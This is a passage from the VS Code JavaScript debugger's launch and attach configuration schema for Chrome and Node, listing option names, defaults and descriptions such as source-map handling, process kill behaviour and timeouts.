be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":0,"description":"Port for the browser to listen on. Defaults to \"0\", which will cause the browser to be debugged via pipes, which is generally more secure and should be chosen unless you need to attach to the browser from another tool.","type":"number"},"profileStartup":{"default":true,"description":"If true, will start profiling soon as the process launches","type":"boolean"},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"type":"array"},"runtimeExecutable":{"default":"stable","description":"Either 'canary', 'stable', 'custom' or path to the browser executable. Custom means a custom wrapper, custom build or CHROME_PATH environment variable.","type":["string","null"]},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"userDataDir":{"default":true,"description":"By default, the browser is launched with a separate user profile in a temp folder. Use this option to override it. Set to false to launch with your default user profile. A new browser can't be launched if an instance is already running from `userDataDir`.","type":["string","boolean"]},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}}}},"configurationSnippets":[{"body":{"name":"Launch Chrome","request":"launch","type":"chrome","url":"http://localhost:8080","webRoot":"^\"${2:\\${workspaceFolder\\}}\""},"description":"Launch Chrome to debug a URL","label":"Chrome: Launch"},{"body":{"name":"Attach to Chrome","port":9222,"request":"attach","type":"chrome","webRoot":"^\"${2:\\${workspaceFolder\\}}\""},"description":"Attach to an instance of Chrome already in debug mode","label":"Chrome: Attach"}],"label":"Web App (Chrome)","strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch configuration](command:extension.js-debug.createDiagnostics)."},"type":"chrome"},{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"attach":{"properties":{"address":{"default":"localhost","description":"IP address or hostname the debugged browser is listening on.","type":"string"},"browserAttachLocation":{"default":null,"description":"Forces the browser to attach in one location. In a remote workspace (through ssh or WSL, for example) this can be used to attach to a browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":9229,"description":"Port to use to remote debugging the browser, given as `--remote-debugging-port` when launching the browser.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}],"tags":["setup"]},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":false,"markdownDescription":"Whether to reconnect if the browser connection is closed","type":"boolean"},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless 